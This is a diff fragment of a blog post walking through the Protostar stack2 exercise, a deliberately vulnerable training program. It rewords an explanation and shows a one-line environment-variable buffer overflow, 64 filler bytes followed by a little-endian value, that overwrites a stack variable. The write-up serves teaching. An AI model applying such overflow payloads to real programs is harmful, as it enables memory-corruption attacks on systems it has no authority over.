chuang76/website-hugo/content/posts/protostar_p1.md

 }
 ```

 Since the value of buffer is copied from the environment variable which we can control, let's exploit the program with the environment variable GREENIE.
-Similarly, the value of modified should be overwritten as \x0a\x0d\x0a\x0d.
+Again, the value of modified should be overwritten in little-endian format.

 ```
 $ GREENIE=`python -c "print('a' * 64 + '\x0a\x0d\x0a\x0d')"` ./stack2